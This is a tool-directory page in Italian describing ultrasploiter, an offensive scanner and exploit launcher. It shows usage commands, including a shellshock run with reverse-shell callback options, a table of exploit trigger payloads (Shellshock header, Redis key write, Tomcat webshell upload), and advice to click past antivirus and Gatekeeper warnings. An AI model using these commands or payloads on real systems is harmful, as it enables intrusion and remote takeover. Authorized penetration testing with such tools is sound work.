Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ultrasploiter — Un singolo binario che unisce un port scanner, l'indice completo di Exploit-DB (47k voci) e moduli exploit eseguibili in un unico strumento. Scritto in Rust, funziona su Linux, Windows e macOS. | Kitploit
Strumenti/GitLabGitLab/vqkro/ultrasploiter
Frameworks per Penetration TestingRicognizioneScanner di VulnerabilitàFramework di ExploitMappatura della ReteScansione PorteExploitSfruttamento di Applicazioni WebRaccolta InformazioniCommand and ControlRed Teaming
1013h 11m faNon ancora revisionato
Sviluppo Payload
GitLabvqkro/ultrasploiter

ultrasploiter

Un singolo binario che unisce un port scanner, l'indice completo di Exploit-DB (47k voci) e moduli exploit eseguibili in un unico strumento. Scritto in Rust, funziona su Linux, Windows e macOS.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

UltraSploiter

scan, match, exploit — un IP in ingresso, shell in uscita.

Un singolo binario che unisce un port scanner, l'indice completo di Exploit-DB e un insieme di moduli exploit eseguibili in un unico strumento. Funziona su Linux, Windows e macOS.

lavoronormalmentequi
Trova servizi su un hostnmapUltraSploiter scan <ip>
Cerca exploitsearchsploitUltraSploiter search <kw>
LancialimsfconsoleUltraSploiter exploit <ip> <module>

UltraSploiter menu


Installazione

Il modo più semplice e migliore è scaricare il binario precompilato ed eseguirlo. Niente da installare, nessuna dipendenza — un unico file autonomo.

Scarica dalla pagina delle Release:

  • Windows — UltraSploiter-windows-x86_64.exe → doppio clic
  • Linux — UltraSploiter-linux-x86_64
  • macOS — nessun binario precompilato ancora; compilalo con un solo comando (sotto)

Attenzione: gli strumenti di sicurezza vengono segnalati. Windows SmartScreen e l'antivirus probabilmente avviseranno o metteranno in quarantena il binario — clicca Ulteriori informazioni → Esegui comunque, oppure aggiungi un'esclusione se intendi conservarlo.

Windows

Doppio clic su UltraSploiter.exe. Si apre il menu.

Se SmartScreen avvisa di un editore sconosciuto (lo farà, per qualsiasi binario non firmato), clicca Ulteriori informazioni → Esegui comunque.

Linux

chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64

macOS

chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64

Se Gatekeeper lo blocca (di nuovo, qualsiasi binario non firmato), fai clic destro → Apri, oppure rimuovi il flag di quarantena una volta:

xattr -d com.apple.quarantine UltraSploiter-macos-arm64

Compilazione dal sorgente

Necessaria solo se non esiste un binario per la tua piattaforma, o se vuoi modificarlo. È richiesto Rust 1.74+.

Linux

sudo apt install build-essential    # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

macOS

xcode-select --install              # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

Windows

git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1                         # -> UltraSploiter.exe

build.ps1 usa la toolchain stable-x86_64-pc-windows-gnu, che si collega con MinGW — quindi non hai bisogno di Visual Studio o MSVC. Installa quella toolchain se manca. Se hai già MSVC Build Tools, anche un semplice cargo build --release funziona.

Attenzione Windows + GNU: windows-sys (richiamato da tokio) invoca dlltool, che a sua volta richiama l'assembler as — e il componente rust-mingw non include as. build.ps1 cerca un bin MinGW che lo contenga in %~dp0tools\mingw64\bin e %USERPROFILE%\tools\mingw64\bin, e lo antepone al PATH quando lo trova. Metti lì una build di winlibs se incontri error calling dlltool. Le toolchain MSVC non sono interessate.


Esecuzione

Senza argomenti ottieni il menu:

   1)  Scan a target           find open ports and services
   2)  Search exploits         keyword lookup
   3)  List runnable modules
   4)  Run an exploit          pick a target and a module
   5)  Console                 advanced msf-style commands
   0)  Exit

Riga di comando

UltraSploiter scan 10.0.0.5                      # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4        # range, fast timing
UltraSploiter scan 10.0.0.5 -p -                 # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU                  # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491                          # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb                      # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console

Su Linux/macOS, anteponi ./ (es. ./UltraSploiter scan 10.0.0.5).

Flag di scansione

flagsignificato
-p <spec>top (1000), 80,443, 1-1024, - (tutte)
-T0..-T5template di timing — da più lento/silenzioso a più veloce/rumoroso
-sUscansione con probe UDP
-sVrilevamento servizio/versione (attivo di default)
--no-bannersalta il banner grabbing
--jsonJSON su stdout
-oX <file>XML in stile nmap

Lo scanner è asincrono (tokio): ogni livello -T imposta quanti socket sono in volo contemporaneamente (fino a 8000 con -T5), quindi copre i top-1000 di nmap in un paio di secondi. Ogni "open" è un handshake TCP completato, quindi i risultati sono esatti.

Opzioni (-o key=value)

chiaveusata dasignificato
lhost, lportmoduli rev-shellindirizzo di callback
rportmoduli websovrascrive la porta HTTP
pathshellshock, struts, phpunitpercorso dell'endpoint
user, passtomcat_managercredenziali del manager
coresolr_rcenome del core Solr
filegrafana_lfifile da leggere
ssh_pubkeyredis_unauthchiave da inserire in authorized_keys
src, dstproftpd_modcopycopia sorgente / destinazione
timeouttuttitimeout del socket in secondi

Database degli exploit

search e info sono supportati dall'indice completo di Exploit-DB — oltre 47.000 voci (lo stesso dataset usato da searchsploit), incluso nel binario. Quando una voce contiene un CVE che un modulo eseguibile implementa, info collega i due:

$ UltraSploiter info 17491
Exploit-DB 17491
  description  vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
  codes        OSVDB-73573;CVE-2011-2523

  [runnable] vsftpd_234
  UltraSploiter exploit <ip> vsftpd_234

Moduli eseguibili (37)

moduloCVEtrigger
vsftpd_234CVE-2011-2523username :) → root bind shell sulla 6200
unrealircd_backdoorCVE-2010-2075AB; <cmd> via IRC
distcc_execCVE-2004-2687argomento del compilatore del protocollo DIST
proftpd_modcopyCVE-2015-3306copia file SITE CPFR/CPTO
redis_unauth—CONFIG SET scrive una chiave o una voce cron
shellshockCVE-2014-6271User-Agent: () { :; }; <cmd>
struts2_5638CVE-2017-5638OGNL in Content-Type
tomcat_putCVE-2017-12615PUT di un webshell JSP
tomcat_manager—deploy di un WAR via /manager
elasticsearch_groovyCVE-2015-1427RCE Groovy in _search
drupalgeddon2CVE-2018-7600callback di render della Form API
phpunit_evalCVE-2017-9841eval-stdin.php
jenkins_scriptCVE-2019-1003000Groovy non autenticato su /script
solr_rceCVE-2019-17558template Velocity in stream.body
grafana_lfiCVE-2021-43798lettura file tramite path traversal del plugin
webmin_backdoorCVE-2019-15107password_change.cgi invia un valore a una shell
php_cgi_arg_injectionCVE-2012-1823-d auto_prepend_file tramite la query string

Ognuno implementa un check() non distruttivo e un run().

Moduli del catalogo (data-driven)

Scarica lo strumento